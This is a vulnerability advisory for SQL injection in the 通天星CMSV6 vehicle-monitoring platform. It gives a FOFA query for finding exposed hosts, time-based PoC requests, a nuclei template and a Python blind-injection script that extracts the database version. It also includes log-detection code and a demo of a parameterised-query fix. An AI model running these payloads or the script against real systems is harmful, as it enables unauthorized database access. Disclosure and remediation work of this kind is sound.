0x00. Disclaimer
Any technique, information or tool covered in this article is provided for learning and reference only. Do not use the techniques described here for illegal purposes; any illegal act is unrelated to the author. Please comply with the Cybersecurity Law of the People's Republic of China.
Cybersecurity Law of the People's Republic of China
Article 27 provides:
No individual or organization may engage in activities that endanger cybersecurity, such as illegally intruding into others' networks, interfering with the normal functioning of others' networks, or stealing network data; may not provide programs or tools specifically intended for intruding into networks, interfering with normal network functions and protective measures, stealing network data or other activities that endanger cybersecurity; and, knowing that another person is engaged in activities that endanger cybersecurity, may not provide them with technical support, advertising, payment settlement or other assistance.
0x01. Product Overview
The 通天星CMSV6 vehicle positioning and monitoring platform is an integrated platform that combines automatic WiFi download, TTS voice message dispatch, school-bus card swiping, fuel consumption statistics, 3G/4G video surveillance, GPS positioning, remote video playback and track query.
0x02. Vulnerability Description
The disable;downloadLogger.action and delete.do;downloadLogger.action endpoints of the 通天星CMSV6 vehicle positioning and monitoring platform are vulnerable to SQL injection through the ids query parameter.
0x03. Asset Discovery
FOFA:body="/808gps/"
0x04. Vulnerability Reproduction
4.1 Request tests
1. /run_stop/delete.do;downloadLogger.action
GET /run_stop/delete.do;downloadLogger.action?ids=1+and+sleep(5) HTTP/1.1
Host: {host}
2. /edu_security_officer/disable;downloadLogger.action
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+1=if(1=1,sleep(2),1) HTTP/1.1
Host: {host}
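The two requests above are also what a defender needs to recognise in the application server's access log. The following Python is an added example, not code from the original post or from the vendor: it scans constructed NCSA-style access log lines, strips the ";downloadLogger.action" path-parameter suffix from each path segment before matching the two affected endpoints, and flags any ids value that is not a plain comma-separated list of integers or that carries a time-based marker (sleep(), if(), and the common MySQL equivalent benchmark()). The expectation that ids is a list of integers, and the log format itself, are assumptions rather than facts stated on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named on the page, with the ";downloadLogger.action" suffix removed.
AFFECTED_PATHS = {
    "/run_stop/delete.do",
    "/edu_security_officer/disable",
}

# Assumption: a legitimate ids value is one or more integers separated by commas.
VALID_IDS = re.compile(r"^\d+(,\d+)*$")

# Functions used by the PoC (sleep, if) plus benchmark, a common MySQL time-based equivalent.
TIME_MARKERS = re.compile(r"\b(sleep|benchmark|if)\s*\(", re.IGNORECASE)

# NCSA common log format (Tomcat AccessLogValve "common" pattern), assumed here:
# client ident user [timestamp] "METHOD URI PROTOCOL" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+'
)


def normalize_path(path):
    """Drop ';param' suffixes from every segment, so that
    '/run_stop/delete.do;downloadLogger.action' maps to '/run_stop/delete.do'."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def inspect_request(uri):
    """Return the reasons a request to an affected endpoint looks suspicious ([] if none)."""
    parts = urlsplit(uri)
    path = normalize_path(parts.path)
    if path not in AFFECTED_PATHS:
        return []
    reasons = []
    # The PoC relies on the path-parameter suffix, so its presence is worth a look by itself.
    if path != parts.path:
        reasons.append("path-parameter suffix on affected endpoint: " + parts.path)
    # parse_qs decodes percent-escapes and turns '+' into spaces, as the server would.
    for value in parse_qs(parts.query, keep_blank_values=True).get("ids", []):
        if not VALID_IDS.match(value):
            reasons.append("non-numeric ids value: " + value)
        if TIME_MARKERS.search(value):
            reasons.append("time-based injection marker in ids")
    return reasons


def scan_log(lines):
    """Parse each log line and collect findings for requests that inspect_request flags."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        reasons = inspect_request(m.group("uri"))
        if reasons:
            findings.append({
                "client": m.group("client"),
                "ts": m.group("ts"),
                "uri": m.group("uri"),
                "status": int(m.group("status")),
                "reasons": reasons,
            })
    return findings


# Constructed sample log lines: one normal delete, the two PoC requests from the page,
# a suffixed request with a benign ids value, and an unrelated page load.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /run_stop/delete.do?ids=12,13 HTTP/1.1" 200 51',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0800] "GET /run_stop/delete.do;downloadLogger.action?ids=1+and+sleep(5) HTTP/1.1" 200 51',
    '10.0.0.9 - - [01/Jan/2024:10:00:13 +0800] "GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+1=if(1=1,sleep(2),1) HTTP/1.1" 200 51',
    '10.0.0.7 - - [01/Jan/2024:10:00:15 +0800] "GET /edu_security_officer/disable;downloadLogger.action?ids=7 HTTP/1.1" 200 51',
    '10.0.0.5 - - [01/Jan/2024:10:00:20 +0800] "GET /808gps/index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["client"], f["status"], f["uri"])
        for r in f["reasons"]:
            print("    -", r)
```

Because the check normalizes the path before matching, it also catches variants that append a different suffix, and because it flags any non-integer ids rather than only the exact PoC strings, it is not defeated by trivial rewording of the payload.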
4.2 nuclei PoC test
id: CMSV6_sql

info:
  name: CMSV6_sql_inject
  author: kzzzqqwewqwq
  severity: medium
  metadata:
    fofa-query: body="/808gps/"

requests:
  - raw:
      - |+
        @timeout: 30s
        GET /edu_security_officer/disable;downloadLogger.action?ids=1+and+sleep(2) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

      - |
        GET /edu_security_officer/disable;downloadLogger.action?ids=1+and+sleep(5) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

      - |
        GET /run_stop/delete.do;downloadLogger.action?ids=1+and+sleep(5) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Connection: close

    matchers-condition: or
    matchers:
      - type: dsl
        condition: and
        dsl:
          - status_code_1 == 200
          - (duration_2 >= 5 && duration_2 < 7) && status_code_2 == 200

      - type: dsl
        condition: and
        dsl:
          - (duration_3 >= 5 && duration_3 < 7) && status_code_3 == 200
4.3 Python script
Probes whether the vulnerability exists and then enumerates the database version string character by character.
# -*- coding: utf-8 -*-
import time
import sys
import requests

requests.packages.urllib3.disable_warnings()

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a1b)XWEB/9165"
}


def len_(url0, sql_1):
    """Find the length of sql_1 (1..14) by timing a conditional sleep(3)."""
    len_f = 0
    for lens in range(1, 15):
        url = f"{url0}?ids=1+AND+1=if(length({sql_1})={lens},sleep(3),1)"
        try:
            a = time.time()
            rep_p = requests.get(url=url, headers=headers, timeout=10)
            b = time.time()
            if 3 < (b - a) < 4 and rep_p.status_code == 200:
                print(f"{url0} exist vuln !!!\nfind the {sql_1} length is:", lens)
                len_f = lens
                return len_f
        except requests.exceptions.RequestException as e:
            print("An error occurred:", e)
    if len_f == 0:
        print("find length fail !!!! please check !!!")
        sys.exit()
    return len_f


def name_(lens, url0, sql_1):
    """Recover sql_1 one character at a time; substr() positions start at 1."""
    name_p = []
    for N_char in range(1, lens + 1):
        for nm_char in "abcdefghijklmnopqrstuvwxyz0123456789-_~@.":
            url = f"{url0}?ids=1+AND+1=if(substr(({sql_1}),{N_char},1)='{nm_char}',sleep(4),1)"
            try:
                a = time.time()
                rep_p = requests.get(url=url, headers=headers, timeout=10)
                b = time.time()
                if 4 < (b - a) < 5 and rep_p.status_code == 200:
                    name_p.append(nm_char)
                    break
            except requests.exceptions.RequestException as e:
                print("An error occurred:", e)
    if not name_p:  # the original compared the list to 0, which never matched
        print("find name fail !!!! please check !!!")
        sys.exit()
    print(f"find the {sql_1} is : ", "".join(name_p))


if __name__ == "__main__":
    url = "http://host"  # replace host with the address under test
    sql_1 = "@@version"
    path = [
        "/run_stop/delete.do;downloadLogger.action",
        "/edu_security_officer/disable;downloadLogger.action",
    ]
    for ph in path:
        url0 = f"{url}{ph}"
        name_(len_(url0, sql_1), url0, sql_1)
    print("over!!")
0x05. Remediation
Temporary mitigation
Use prepared statements with bound variables; validate and filter input; deploy a protective device (such as a WAF) in front of the system. Unless necessary, do not expose the affected system on the public internet.
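To make the "prepared statements, bound variables, input validation" advice concrete, the following Python is an added example that is not the vendor's code: the platform's real schema and query are unknown, so the run_stop table and the DELETE ... WHERE id IN (...) shape are assumptions, and an in-memory SQLite database stands in for the real one. The vulnerable function concatenates the ids string into the SQL text, so a value in the shape of the page's PoC reaches the database engine as code (SQLite reports the unknown sleep function instead of pausing, which is enough to show the string was parsed as SQL). The hardened function validates ids against an integer-list pattern and binds each id as a separate parameter, so the value can never change the statement.

```python
import re
import sqlite3

# Assumption: a legitimate ids value is one or more integers separated by commas.
VALID_IDS = re.compile(r"^\d+(,\d+)*$")


def setup_db():
    """Constructed stand-in for the application database: three rows in a run_stop table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE run_stop (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO run_stop VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])
    conn.commit()
    return conn


def delete_vulnerable(conn, ids):
    """The pattern behind the bug: untrusted text is pasted into the SQL statement."""
    sql = f"DELETE FROM run_stop WHERE id IN ({ids})"  # ids is attacker-controlled
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def delete_safe(conn, ids):
    """Hardened form: strict allow-list validation, then one bound parameter per id."""
    if not VALID_IDS.match(ids):
        raise ValueError("ids must be a comma-separated list of integers")
    id_list = [int(x) for x in ids.split(",")]
    placeholders = ",".join("?" * len(id_list))  # "?,?,?" for three ids
    cur = conn.execute(f"DELETE FROM run_stop WHERE id IN ({placeholders})", id_list)
    conn.commit()
    return cur.rowcount


def remaining(conn):
    """Row count left in the table, used to observe what each call actually did."""
    return conn.execute("SELECT count(*) FROM run_stop").fetchone()[0]


def try_delete(fn, conn, ids):
    """Run one delete implementation and classify the outcome for comparison."""
    try:
        return ("deleted", fn(conn, ids))
    except ValueError as e:
        return ("rejected", str(e))
    except sqlite3.OperationalError as e:
        # Reached only when the ids text was interpreted as SQL by the engine.
        return ("sql-error", str(e))


if __name__ == "__main__":
    payload = "1 and sleep(5)"  # same shape as the PoC on the page
    for fn in (delete_vulnerable, delete_safe):
        conn = setup_db()
        print(fn.__name__, "normal:", try_delete(fn, conn, "1,2"))
        print(fn.__name__, "payload:", try_delete(fn, conn, payload), "rows left:", remaining(conn))
```

The validation step alone would already stop the PoC, but the parameter binding is what removes the class of bug: even a value that slipped past a weaker pattern is handed to the driver as data, never spliced into the statement text.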
Upgrade fix
The vendor has released a new version that fixes the vulnerability. Visit the official website or contact vendor after-sales support as soon as possible to obtain the upgrade package or patch.